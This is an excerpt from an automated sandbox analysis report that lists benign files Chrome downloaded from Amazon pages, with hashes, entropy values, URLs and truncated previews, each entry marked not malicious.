                                                                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiIyNXB3SWdtQWU2QTVoeDVVTG9OV0laODBLbzJjbktOTHpacUdjbjlLT2c4In0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiOWVza0FuRlBsM3VCQzkwUmFWakxNaVI3NXZIQi0wQUVmMmg0RzU3ZXNpcyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC44LjEwLjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"dU2MmRUQSugaJAJvEN4uaQHx-KXdOkjj0yK8_aH4Afr3kN7DPOZRt6yLTS3UchBE5M-dgPPPBuKADj4KEK4B22SO6WQquL5J27AUPqQBGgr44-iFGVJdOLLlfirFlJmcYv6DUFRYiPsQFGMr1JFqInj19jgkOxzR6qqcNuTCB0wGEMeTU80r-igCjeQG6TIzPro7yKd_-UxsxO6OGAySmlIJIoU54X0p0ATNoZyAfkhb8kb0oN8unOU
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):66
                                                                                                                                                                                                                                                                      Entropy (8bit):3.9159446964030753
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:Sq5TQRaELVHecsUDBAeHD5k:Sq5gJ+csHej5k
                                                                                                                                                                                                                                                                      MD5:CFB54589424206D0AE6437B5673F498D
                                                                                                                                                                                                                                                                      SHA1:D1EF6314F0F68EFDD0BA8F6CA9E59BFF863B1609
                                                                                                                                                                                                                                                                      SHA-256:285AC183C35350B4B77332172413902F83726CA8F53D63859B5DA082FD425A1C
                                                                                                                                                                                                                                                                      SHA-512:70FDCA4A1E6B7A5FFED3414E2DB74FECA7E0FD17482B8CB30393DFEE20AB9AD2B0B00FF0C590DD0E8D744D0EAD876CE8844519AF66618ED14666BCA56DF2DA21
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:1.dbf288588465463a914bdfc5e86d465fb3592b2f1261dc0e40fcc5c1adc8e7e4
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):85
                                                                                                                                                                                                                                                                      Entropy (8bit):4.4533115571544695
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1tean:F6VlM8aRWpqS1ln
                                                                                                                                                                                                                                                                      MD5:C3419069A1C30140B77045ABA38F12CF
                                                                                                                                                                                                                                                                      SHA1:11920F0C1E55CADC7D2893D1EEBB268B3459762A
                                                                                                                                                                                                                                                                      SHA-256:DB9A702209807BA039871E542E8356219F342A8D9C9CA34BCD9A86727F4A3A0F
                                                                                                                                                                                                                                                                      SHA-512:C5E95A4E9F5919CB14F4127539C4353A55C5F68062BF6F95E1843B6690CEBED3C93170BADB2412B7FB9F109A620385B0AE74783227D6813F26FF8C29074758A1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.8.10.0".}
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9748
                                                                                                                                                                                                                                                                      Entropy (8bit):4.629326694042306
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJq:v5C4ql7BkIVmtRTGXvcxBsq
                                                                                                                                                                                                                                                                      MD5:EEA4913A6625BEB838B3E4E79999B627
                                                                                                                                                                                                                                                                      SHA1:1B4966850F1B117041407413B70BFA925FD83703
                                                                                                                                                                                                                                                                      SHA-256:20EF4DE871ECE3C5F14867C4AE8465999C7A2CC1633525E752320E61F78A373C
                                                                                                                                                                                                                                                                      SHA-512:31B1429A5FACD6787F6BB45216A4AB1C724C79438C18EBFA8C19CED83149C17783FD492A03197110A75AAF38486A9F58828CA30B58D41E0FE89DFE8BDFC8A004
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 165x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10670
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967452360122912
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:wTj+3QA3wnNfKS2a1F63GEmoQQEw/4n0W3JpzQ2xiNPLQiFO0hVn/TJAqPH:A+3zcCS2aYmoQQEwwzJNYJQfyVA4
                                                                                                                                                                                                                                                                      MD5:17F2BBD6798E35F79DDA2F0EE3F7EB8B
                                                                                                                                                                                                                                                                      SHA1:E15D08872720BC93A7790BD177FAB22E67BC77A0
                                                                                                                                                                                                                                                                      SHA-256:D7E6B519E9FBFEA68CD6A247EB2D55D4EC057ED9C941B5490D5B9B3C0C61E99E
                                                                                                                                                                                                                                                                      SHA-512:5036DE5E86559BF40A8185F16D2712E0BAA93D5AF78072FD9E93DAB305A38FB847B99E44D57F52FFB995194BCC7F6D9E8801C36BC162FD3BA9B4E95853B1EAE3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71GWDQsQzaL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ.aq.#2B....CDRT.........$34Sbcrtu....6Us...%5dE..................................................1..R..!AQ...#2q..a.3..."...............?.(.....&...UH..r.tb?@...7..}..][...D..1.".gw.>..3...Da(u......SOWQ5|.`\..Hb).(..X.........Xw..{....R.qo..~.8.]...|...<g..A=Q.kB.$*...G....A.ho.8..3.2.*......6.S......K.9...2....E}.9..........v.....h.... gU.>.......>?.Z...<]3X*i.vE..W...... ..QH...U..41.......Q..N.<.u(.kr.x.=......o..x.>6.6....O.r,H".x... .."..Gn..]...qqYb....Z.M....8.T.3Z..Et..c..S(..}..fA.=..XQ.X.}...P..i.}q...0...]p...../.5.$+Y}>}..1....?...=...PT.........O.<h..|.hq.L.3.s..P.znEh...re.V@.....p..!...x....O....!.[8.....#....Mf.-..'W03G.H....J.3.pw=.z.~~.`...[.].7...M.tlY.=.<[E.$.......F..W....8...7...Bf._.Zi.DO.\.8[....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):36341
                                                                                                                                                                                                                                                                      Entropy (8bit):7.900679313804417
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyjHZfudBy1DGRy1CsJoEFrfakmzGWl6hkuaCtkBLYNsqCBi1:4fZ2dBy1DssJVtfzmzGW0VeWsk
                                                                                                                                                                                                                                                                      MD5:E20F556F2DFC910FD4585701F6A10472
                                                                                                                                                                                                                                                                      SHA1:1228069271EEDD1A9EA8C4EB11B68F87891D03AB
                                                                                                                                                                                                                                                                      SHA-256:4F38A969193450AC32E1CE78B926CD6E364400A75D66E1D5A5DA6E39D8BEA7FA
                                                                                                                                                                                                                                                                      SHA-512:A343F373BA9C567CE9053AA992F25A11DC03F7E7BDDF1DACEF968C5A26B253EEF9D00C48E218FCDAABF98C118D2080A71EABCADBE1CAB86C1664EED5C8CC697F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_OHL_BTS24_GW_Bubbler_Furniture_400x400_EN._CB567114372_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10733
                                                                                                                                                                                                                                                                      Entropy (8bit):7.885934182718208
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Ym0kcHGqaV4LMM67mdanbf/gmmj2HiZrPRGmU3r8r93rZlS2oztBfubDX8PbmtYD:PoHGqaV4LxonjgmFkrPQTr8r9jSR1ABC
                                                                                                                                                                                                                                                                      MD5:41E60F7A1D6139539601FABD8F36C3CB
                                                                                                                                                                                                                                                                      SHA1:1F3F310B59336A8AF90875ED9BB4B09AC2185ED3
                                                                                                                                                                                                                                                                      SHA-256:BAA6F9ACD8469789404573EC33A27D763E9AA979B6831EA39D47528D3BD25028
                                                                                                                                                                                                                                                                      SHA-512:450E6B65F2D43E59882186BDEB4CAF335F63C4574C33BDBC4C880E53EA9839466F0E003B947A04058530F7554555FB4EF1E5A2C3A2A7A36B5C09AEF326402077
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................x8.}W.=.).7*y&-......{................}..(....:....kQ<..s^.GN...&...........W...V.9w.:........z....2..V........8..t.F/D#...........y...6...).....yP.v0.} H....k...vd........3k......4$t.s.........{..0z........>..}...9.vm..|..M........I.W.o.........~.S....../\R..g...)q.;..x..j..>.G@.....C.o]..l......0......k.[D...zp.M?..8O....u<..[.4.rz..`......Ku...*.>r.'..i...y.=e6uU.k...S..z3..=.....6<..[.Tq.f...V....w.H.....7o~k.....z...z.....r..*....d..K,2By.....^k.....X..G.2.m<f/z..\Ww`..^....oS..y..5.48..`.@..#....^.b....R.RxnK....<.....x{.<..!.].G.....;.^?....W...t......].?=.^....7..|...,}..y.....I.y5..>..9..R. .....X.j....B...2..f....iiOq..S\.D..~....EE.....Wv6S..k.....YN.^lW.R.-<A..\......q.............7z..i...h..@.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (898)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):39792
                                                                                                                                                                                                                                                                      Entropy (8bit):5.597621075181012
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:etDgDhJAefdtymFX6YGiqIysS56Br7xAvnRtLxyJUCN7D:etDgDhGety556BHMiUCN7D
                                                                                                                                                                                                                                                                      MD5:8FF500461A54D906EB4174A1D68572CA
                                                                                                                                                                                                                                                                      SHA1:F9F3356280777BDC2EFFBB3150439E753A8B9A47
                                                                                                                                                                                                                                                                      SHA-256:744C68C533D805B776FB38633DF88781214326B521F41844431163BE8302B0E8
                                                                                                                                                                                                                                                                      SHA-512:56933F50F2039852B43FB1717C3DAEEF83B99FB831C8B84225CF5B46054F422C75286F2D232E38D92BDCE23E45F1A313979F1101150E2B9D39C17A4E74CD7F16
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:'use strict';mix_d("OctopusSearchResultCards__octopus-search-result-card:octopus-search-result-card__2IM4e7yC","require exports tslib @c/logger @c/scoped-dom @c/metrics @c/dom @c/remote-operations @p/A @c/browser-operations".split(" "),function(Ha,K,q,ib,jb,kb,P,lb,mb,nb){function W(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}function Ia(a){if(a&&a.__esModule)return a;var b=Object.create(null);a&&Object.keys(a).forEach(function(c){if("default"!==c){var d=Object.getOwnPropertyDescriptor(a,.c);Object.defineProperty(b,c,d.get?d:{enumerable:!0,get:function(){return a[c]}})}});b["default"]=a;return b}function Ja(a,b){n["default"].cardRoot.querySelector(a).addEventListener("click",function(){X(b)})}function ob(){var a=n["default"].cardRoot.querySelector("#apb-browse-search-filter");a&&a.addEventListener("click",function(){X("filter-button")})}function ma(a,b,c){(a=n["default"].cardRoot.querySelector(a))&&a.addEventListener("click",function(d){d=d.target;d.classList.contai
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17885
                                                                                                                                                                                                                                                                      Entropy (8bit):7.904879679511873
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1Tug6vQZk0rnz6kHo70bnvwSpDRbCx2n1:1Tv4z0rzbxzvw+DNgK
                                                                                                                                                                                                                                                                      MD5:4FE1CF1B9605301EC2676CF8F6A4E182
                                                                                                                                                                                                                                                                      SHA1:E33C0E2FCF0F7546D22143A718B37C1B263A00EE
                                                                                                                                                                                                                                                                      SHA-256:84ECCBE2FC7BE68B3E90D455B7666DAF8F75A4D6E4AB629A9FFB35D3A11A70D4
                                                                                                                                                                                                                                                                      SHA-512:46BBA7B87313203D5929BB41C0688D41D5F3304CEC73BF9929E93EAC99CBCA07632D52338F18CBF14EA016A6862BC2A958DA4353DA265CD946016233678123C4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Top-brands-Wilson-750x300.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."...........................................................................&...g............uZf.>._..............}5....[..........."..~.....8Z.@...........`.....r.R..........x.m.|..&>=...............O.1...#..2...............(.s..+&.$.............m...\}...i.m+...........U,.5~gx.2V.d...h............,1.<...d..A...........c>../?~...c..t...........y.@....P.>..@...bd....&.@.....9..N/~.....:4....x...g.............:v?O~}...o....Q...t9...&./R.W...........SK{....P9.b...9F.Oa.n).;.t.....:._.....~?d.9................._|u.+`......4^..{>......y..H..<~u.Z%k(.......3.."..Sb.D..l)9....'.....Y`i*...............<......`9...5..,.........nk@...j.7._o..4................Ai.I....y....n............y......lX0k.@..}.f.........>...-.X.....n................7..J..i..^3_...}S.............4|...K....|...T.j}.H.......Z..;....m...0...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):44691
                                                                                                                                                                                                                                                                      Entropy (8bit):7.952273097635305
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:XFzU650NkjT5c830bN3wk2vAzQgmZmYE3mf/oqcXXXXjTIHUPkzPM6:VY68kjT5l3AN3lV1dYE3mf/3OEHUkt
                                                                                                                                                                                                                                                                      MD5:2A1D0E91B5AC1F0A6A394F3964B311CC
                                                                                                                                                                                                                                                                      SHA1:A85F7BC2516B1B31B6A88B4792FD0BBEF4618C31
                                                                                                                                                                                                                                                                      SHA-256:26482FF03EFD85FEE3F189A3C2BA484774818985006DC41221EBB42660F2B5A1
                                                                                                                                                                                                                                                                      SHA-512:DE78263836DEE483A42AC5964BDCBB7AFF8C9B6BA9F87869045CF3AF82D43C9696A5771B3BA48842AE482E7D2A5E8EF0B962864E5D7B83232F97A46FA9AC9D38
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_UFG_Groceryessentials_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d.............................................................................................................!1"A..2Qa..#Uq.BRr.....3bt.....$67Sc.....%Csu........8DTd..45E..........................!.1A.."Qaq.2RS.......#B......3Cbr..$4s....c..%5T.............?...@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@.....@(......P..@(......P..@;u4....M.a%7K.V\O..\..>....[.>..V.)..,.oC&....X.Q..Gh(yL..\U......*..F.4y!.....M...6....dks.(.$..cJ...U...O..iK.K...G....l5...0..$....FO..Z.:.#.Vt9..[..|...Z+{..w.....}..3...?.J.*<......2U.p..........."...jE....R.E....>..>..n)'..+.....G....R...V.....r....?I&;....l.CmE.J`^.%...-{"...fR'..h.2.......W..(~....3.e5..q..%'...g-...TBn.5.<..@s.....}^EK.T^..o.cOa../a... .qq!2$H..^RXQ..Y...Z.....rS.....6Ex.I.?........e.F.O]....}..p..iq....y.G..5(T.....b...@(......P..@(.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9048
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946699892653741
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:5nTI3iF86Q7h5n+fHY1ZqTGGLchuIx19i8g4+JU6zGGHe:RI36GbPLqTGAcf19RniCGHe
                                                                                                                                                                                                                                                                      MD5:654A5B71216CBA885D29D630DFD6862A
                                                                                                                                                                                                                                                                      SHA1:04400026214CC2220DEC7B7C17C0374FCD84D3F1
                                                                                                                                                                                                                                                                      SHA-256:D8B93B46575448AB57B77BFC20016393E491D6D5C1F68F7F2987CCEC999FF8D2
                                                                                                                                                                                                                                                                      SHA-512:458A8C3F27898387357F0C3C8FECFA8AE8668AFF24C6BC34D7E8BCB26C22A6DD97B253C89893505FF7C5C795626C406A7792D90C88506E8AD2401186BA7995F9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.}..".............................................................!.."1.Aq..2Q.#a...3R....$BCb...Srs..%..................................................!1."2A..Qaq...3.................?..R...)@.R...8.i..x.IA..].!p.GW`7F.2_Q\.'....,!.i%|.D...../..Gu..$:#.~&N..A..e..kYq..qk.3{.G...."..,...gnYr.L...n..)b!.u.....!eM,.*.uk....W.E.I.;".d9.S;[..Z..5;.E..9..gW..%....%............R....2.`e.a..4*.|..,jV..<f.....F.......I..05..V.Z..LqA ..L..P...CH.(......)-....8F.I.Q..B4.[P.r..e.YNt*.RB...C%Mr.QM...{TB......j....kh..QC0W.m......*.l.Xd09..0k.%.XY......j$\.h... .C."B..$..U.../.....1..)Yu.,....-..d.e~..J..>a.......xgKR.N.......*.pA..J.rE)J.R...)Bq@..2.k..Y..Jt)D22..-.....rRg..A.A......$.".p.A.r....m....Cuu..LQ.zn....rA.'...H.;..<...tgDs... H..G.FrX.s.6.....S.....w4T|:3...Vh...s).e..v...N....L..,.....k..O..."
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5133
                                                                                                                                                                                                                                                                      Entropy (8bit):5.268249677314524
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:IdNPo5rE8+B/iEbtvFeSDO+ah9Jty0uqY7b/40STfKAHSTfXA3mL/4hpU:IHo5rE8g/iERc+DahHtyAkb/4fKAAXAI
                                                                                                                                                                                                                                                                      MD5:6FAF3E0F9EFAAD272385FB4310135C14
                                                                                                                                                                                                                                                                      SHA1:42E860A9B430475BC046B772023D189069395528
                                                                                                                                                                                                                                                                      SHA-256:6BA78C3BC016AD70BC0199DC9354BC730A4A7B5B97D96EF1AA690A3DEE151579
                                                                                                                                                                                                                                                                      SHA-512:A579414EF95105F55B8E864BFECC87C9246141067ED7216770C0B69A7AEB372A42D12874445E54A217BA9F42CBEC5B11A1A5A8A05AB0680A6B4C93F5583D6AF8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Search_auto-bottom-advertising-0_portal-batch-fast-btf-loom_placement%22%2C%22pageType%22%3A%22Search%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3MvP19lbmNvZGluZz1VVEY4Jms9dG95cyZjcmlkPTMzRFk4Q1JUS0UwSlcmc3ByZWZpeD10b3klMkNhcHMlMkMyMDQmcmVmPW5iX3NiX25vc3NfMSZwZF9yZF93PXZkS0o3JmNvbnRlbnQtaWQ9YW16bjEuc3ltLjBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9wPTBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9yPUFQQVZDUUpNRks3OFFKRVYxUE1aJnBkX3JkX3dnPXZUaHltJnBkX3JkX3I9ZWI4Mzc5MzItNDhkMC00ZDM1LWI3NDMtYTZiZjYyZjVhODg2JnJlZl89cGRfaHBfZF9hdGZfdW5r%22%2C%22slotName%22%3A%22auto-bottom-advertising-0%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221027%22%2C%22adCreativeId%22%3A%220%22%2C%22adId%22%3A%22300164802756332%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Search_auto-bottom-advertising-0_portal-batch-fast-btf-loom_placement%22%2C%22pageType%22%3A%22Search%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3MvP19lbmNvZGluZz1VVEY4Jms9dG95cyZjcmlkPTMzRFk4Q1JUS0UwSlcmc3ByZWZpeD10b3klMkNhcHMlMkMyMDQmcmVmPW5iX3NiX25vc3NfMSZwZF9yZF93PXZkS0o3JmNvbnRlbnQtaWQ9YW16bjEuc3ltLjBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9wPTBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9yPUFQQVZDUUpNRks3OFFKRVYxUE1aJnBkX3JkX3dnPXZUaHltJnBkX3JkX3I9ZWI4Mzc5MzItNDhkMC00ZDM1LWI3NDMtYTZiZjYyZjVhODg2JnJlZl89cGRfaHBfZF9hdGZfdW5r%22%2C%22slotName%22%3A%22auto-bottom-advertising-0%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221027%22%2C%22adCreativeId%22%3A%220%22%2C%22adId%22%3A%22300164802756332%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (5039), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5039
                                                                                                                                                                                                                                                                      Entropy (8bit):4.846326770438963
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:w5Biav5mBVvCKvkNmemkmmm0mmmdd0wNgOZgO0WEwDSOAwn7i9uFV0t9gr9jpmg/:UHIAITnu3i1SJLXM30Ob4S
                                                                                                                                                                                                                                                                      MD5:BF018284CDA345CE0351F7FE5CB9703B
                                                                                                                                                                                                                                                                      SHA1:84988CB2EFF94081B4C1CE8E8CBEB06F9779838F
                                                                                                                                                                                                                                                                      SHA-256:3899B656185BBC97FD39CD8D0736CC1610ABDC2213CBF1C13E744AAD5D2351B0
                                                                                                                                                                                                                                                                      SHA-512:8C6454FA30CEB910E2A48B1756601D1436ADA236DB479EE9E2AD98A124AE29AA64E6A5425F8AD8BFCD4BFE561BB64060EA05DF2DB18605C18E7086A42F0E9061
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/21o-CCsjGRL.css?AUIClients/OctopusBrowsePageAssets
                                                                                                                                                                                                                                                                      Preview:.a-no-js .apb-browse-hidden-if-no-js{display:none}.apb-browse-back-arrow-icon{width:6px;height:10px;background-repeat:no-repeat;background-image:url(https://m.media-amazon.com/images/S/sash/5wejH04P3ogfQ-4.svg)}.apb-browse-refinements a:hover,.apb-browse-refinements a:hover span{color:#c45500!important;text-decoration:none}.apb-browse-refinements input,.apb-browse-refinements label{cursor:pointer}.apb-browse-refinements label{margin-left:0}.apb-browse-refinements ul{margin-left:0}.apb-browse-refinements .apb-browse-refinements-indent-1{margin-left:12px}.apb-browse-refinements .apb-browse-refinements-indent-2{margin-left:24px}.apb-browse-refinements .apb-browse-refinements-indent-3{margin-left:36px}.apb-browse-refinements .apb-browse-refinements-indent-4{margin-left:48px}.apb-browse-refinements .apb-browse-refinements-icon{top:3px;position:relative}.apb-browse-refinements .apb-browse-refinements-text-separator{background-color:#111;margin-left:2px;margin-right:2px}.a-tablet .apb-browse-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 194 x 295, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):45977
                                                                                                                                                                                                                                                                      Entropy (8bit):7.985058314720174
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Ox2kO+0B5izHhTPdZVliVcR3+/ku/iUYi09ERbCC4lxOQ3JZT9AlpsyjSB:OAkp45izBXfNR35u/izi2GbHU3X9An8B
                                                                                                                                                                                                                                                                      MD5:A824C7A90E2C465DA4C4DB9FD9FC15E4
